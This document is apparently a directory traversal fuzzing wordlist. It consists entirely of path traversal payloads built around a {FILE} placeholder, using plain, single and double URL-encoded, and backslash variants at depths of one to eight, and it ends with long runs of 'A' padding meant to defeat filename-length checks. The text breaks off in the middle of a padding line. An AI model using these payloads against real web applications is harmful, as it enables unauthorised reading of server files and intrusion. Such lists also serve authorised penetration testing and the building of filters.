%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
\../{FILE}&lt;br /&gt;
\../\../{FILE}&lt;br /&gt;
\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
/..\{FILE}&lt;br /&gt;
/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA